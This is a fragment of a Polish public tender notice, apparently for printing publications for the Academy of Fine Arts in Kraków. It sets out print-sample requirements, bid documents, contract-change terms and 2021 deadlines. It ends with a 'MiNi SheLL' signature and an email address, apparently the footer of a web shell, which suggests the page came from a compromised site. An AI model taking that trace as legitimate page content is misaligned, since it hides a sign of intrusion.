class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający żąda złożenia wraz z ofertą przedmiotowych środków dowodowych na potwierdzenie zgodności oferowanych usług z wymaganiami określonymi w opisie przedmiotu zamówienia związanymi z realizacją zamówienia dla każdej części odrębnie, to jest: próbki czyli przykładowej drukowanej książki/publikacji (w zależności od części zamówienia), o cechach i parametrach zbliżonych do parametrów opisanych w specyfikacji publikacji stanowiącej przedmiot zamówienia (załącznik nr 1a i 1b do SWZ – opis przedmiotu zamówienia dla części pierwszej oraz drugiej), dla obydwu części – drukowane w technice offsetowej, środek na papierze matowym /offset, w tym: dla części pierwszej - w miękkiej okładce z przyklejoną na jej grzbiecie lamówką, oprawie szyto-klejonej, wnętrze z kolorowymi ilustracjami, a dla części drugiej – w oprawie twardej szyto-klejonej, tj. parametrami pozwalającymi na ocenę jakości zgodnie z wymaganiami określonymi przez Zamawiającego dla każdej z części, w rozdziale XV niniejszej SWZ. Próbka musi być zrealizowana przez podmiot, który będzie realizował usługi druku publikacji, objęte niniejszą SWZ. <br/>Przedstawiona próbka (dla każdej części odrębnie), będzie podlegała badaniu ocenie w ramach kryterium pozacenowego „Jakość”, zgodnie z rozdz. XV SWZ. <br/>W przypadku, gdy w przedłożonej próbce nie będzie możliwa ocena któregoś z parametrów Zamawiający dla danego parametru przyzna zero (0) punktów. Niezłożenie próbki bądź złożenie takiej próbki, dla której niemożliwa będzie identyfikacja jej wytwórcy (drukarni, która zrealizowała przedłożoną próbkę) stanowiło będzie podstawę do odrzucenia oferty Wykonawcy jako nieodpowiadającej treści SWZ (próbka musi zawierać informację umieszczoną trwale w książce lub musi jej towarzyszyć dokument potwierdzający/ dowód np. nadruk w książce lub inne trwałe oznaczenie książki, załączona kopia faktury wraz z protokołem odbioru). Przedłożona do oceny próbka winna być zrealizowana przez podmiot, który będzie faktycznie realizował usługę druku publikacji w ramach niniejszego zamówienia publicznego.<br/>Sposób oceny próbek w kryterium „Jakość” zostały opisany został w rozdziale XV SWZ. <br/><br/>Wymaganą, badaną i ocenianą przez Zamawiającego w przedmiotowym postępowaniu próbkę, o której mowa w niniejszej SWZ należy złożyć, na mocy postanowień art. 65 ust. 2 ustawy Pzp, w postaci drukowanej książki / czasopisma (zależnie od części zamówienia) i oznaczyć zgodnie z instrukcją podaną w rozdziale XIX niniejszej SWZ oraz złożyć z zachowaniem nieprzekraczalnego terminu wyznaczonego na składanie ofert w niniejszym postępowaniu. Złożenie próbki do oferty odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 – Prawo pocztowe (tekst jednolity Dz.U. z 2020r. poz. 1041 ze zmianami), osobiście lub za pośrednictwem posłańca. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta winna zawierać: <br/> 1) Formularz OFERTY sporządzony według załączonego wzoru, który stanowi załącznik nr 2 do SWZ<br/> 2) oświadczenie Wykonawcy, o którym mowa w Rozdziale VII pkt 1 SWZ - wg załącznika nr 4 do SWZ – potwierdzające brak podstaw wykluczenia. <br/> Jeżeli dotyczy – również oświadczenia każdego z Wykonawców spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia - w zakresie potwierdzenia braku podstaw wykluczenia Wykonawcy, <br/>3) dokumenty, z których wynika prawo do podpisania oferty. Zgodnie z § 13 ust. 1 Rozporządzenia Ministra Rozwoju, Pracy i Technologii - w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy - w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, zamawiający żąda od Wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru.<br/> Jeśli umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy<br/>4)	próbkę (dla każdej części na którą jest składana oferta) do oceny jakości złożoną zgodnie z wymaganiami i wskazaniami określonymi w rozdziale VIII SWZ – przedmiotowe środki dowodowe oraz instrukcją zawartą w rozdziale XIX pkt 4 (odstąpienie od konieczności przesłania elektronicznie wraz z ofertą ze względu na konieczność złożenia próbki - fizycznie)<br/> 5) oświadczenia i/lub dokumenty na podstawie których, Zamawiający dokona oceny skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji (jeżeli Wykonawca zastrzega takie informacje).<br/>5. W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum, spółka cywilna), do oferty powinno również zostać załączone:<br/>1) pełnomocnictwo dla ustanowionego pełnomocnika do reprezentowania ich w postępowaniu, uprawniające do złożenia oferty w ich imieniu. Pełnomocnictwo załączone do oferty, powinno zawierać w szczególności:<br/> a) wskazanie postępowania o zamówienie publiczne, którego dotyczy,<br/> b) mocodawców tj. wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, <br/> c) osobę ustanowionego pełnomocnika <br/> d) jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony (zakres umocowania)<br/> Podpisy na pełnomocnictwie muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli, wymienione we właściwym rejestrze.<br/>2)	oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy (dotyczy Wykonawców wspólnie ubiegających się o udzielenie zamówienia w przypadku, o którym mowa w art. 117 ust. 3 ustawy Pzp), <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Dokument potwierdzający ustanowienie pełnomocnika musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie publiczne. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze. <br/>2. Spółkę cywilną należy traktować jako Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za realizację umowy.<br/>4. Żaden z wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania, zatem Zamawiający będzie sprawdzać, czy nie zachodzą, wobec każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podstawy wykluczenia, o których mowa w art. 108 ust.1 i art. 109 ust. 1 pkt 4),5) i 7) ustawy Pzp <br/>5. Wobec powyższego, oświadczenie o którym mowa w rozdz. VII pkt 1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany umowy wymagają zgody obu Stron i zachowania formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania 455 oraz z uwzględnieniem zapisów art. 454 ustawy Prawo zamówień publicznych. 2. Zamawiający, działając zgodnie z art. 455 ust. 1, dopuszcza również możliwość zmiany umowy, bez przeprowadzenia nowego postępowania, w następujących okolicznościach i w zakresie: 1)<br/>zmiany wysokości wynagrodzenia Wykonawcy w przypadku zmiany ustawowej zmiany stawki podatku VAT – wynagrodzenie Wykonawcy określone w umowie zostanie zmienione z uwzględnieniem nowej stawki podatku VAT. Zmiana wysokości wynagrodzenia należnego Wykonawcy będzie odnosić się wyłącznie do części przedmiotu umowy zrealizowanej zgodnie z terminami ustalonymi w umowie, po dniu wejścia w życie przepisów zmieniających<br/>stawkę podatku od towarów i usług oraz wyłącznie do części przedmiotu umowy, do której zastosowanie znajdzie zmiana stawki podatku od towarów i usług. Wartość wynagrodzenia netto nie zmieni się, a wartość wynagrodzenia brutto zostanie wyliczona na podstawie nowych przepisów 2) gdy nowy Wykonawca ma zastąpić dotychczasowego Wykonawcę w<br/>wyniku sukcesji, wstępując w prawa i obowiązki Wykonawcy, w następstwie przejęcia,<br/>połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia<br/>dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia<br/>warunki<br/>udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to<br/>za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania przepisów<br/>ustawy,3) zmiany terminu realizacji przedmiotu umowy: w sytuacji gdy w czasie trwania umowy z przyczyn niezawinionych przez Wykonawcę nastąpi konieczność zmiany terminu<br/>realizacji przedmiotu umowy. Zmiana nie może spowodować zmiany ceny wynikającej z<br/>oferty Wykonawcy. Zmiana może dotyczyć terminu wykonania umowy bez naliczania kar<br/>umownych;4) zmiany odpowiednich zapisów umowy, w sytuacji gdy w czasie trwania umowy<br/>wystąpią zdarzenia siły wyższej rozumianej jako zewnętrzne, nieprzewidziane zdarzenia<br/>pozostające poza kontrolą Stron, w szczególności wojny i innego działania o charakterze<br/>zbrojnym, działania siły przyrody, akty terroru, zamieszki, rozruchy, strajki i inne działania<br/>zagrażające porządkowi publicznemu, decyzje lub działania władz publicznych, a także klęski<br/>żywiołowe, niemożliwych do przewidzenia i zapobieżenia, których nie dało się uniknąć nawet<br/>przy zachowaniu najwyższej staranności, a które uniemożliwią Wykonawcy wykonanie jego<br/>zobowiązania w części lubcałości,5) odpowiednich zapisów umowy, w sytuacji gdy w czasie<br/>trwania umowy konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego<br/>(wyłącznie w zakresie wynikającym ze zmian prawa); 6) powierzenia określonego zakresu<br/>podwykonawcy lub zmiany zakresu części prac powierzonych podwykonawcy w przypadku, gdy<br/>wprowadzenie nowego podwykonawcy zapewni lepszą realizację danej części zamówienia3.<br/>Strony dopuszczają ponadto zmiany treści umowy w zakresie zmiany sposobu<br/>wykonania przedmiotu umowy lub zmiany terminu wykonania, w okresie stanu zagrożenia<br/>epidemicznego lub stanu epidemii ogłoszonego z powodu COVID-19 i innych chorób zakaźnych<br/>oraz wywołanymi nimi sytuacjami kryzysowymi, które szczegółowo zostały opisane w paragrafie<br/>10 projektowanych postanowień umowy - załącznik nr 3 do SWZ. Inicjatorem zmian może być<br/>Zamawiający lub Wykonawca poprzez pisemne wystąpienie w okresie obowiązywania umowy zawierające opis proponowanych zmian i ich uzasadnienie <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-28 12:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/asp_krakow/proceedings - oferta, a w zakresie próbki do oceny jakości na adres: 31-157 Kraków, Plac Matejki 13 Biuro Zamówień Publicznych I piętro pokój 113</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-28 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-27</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com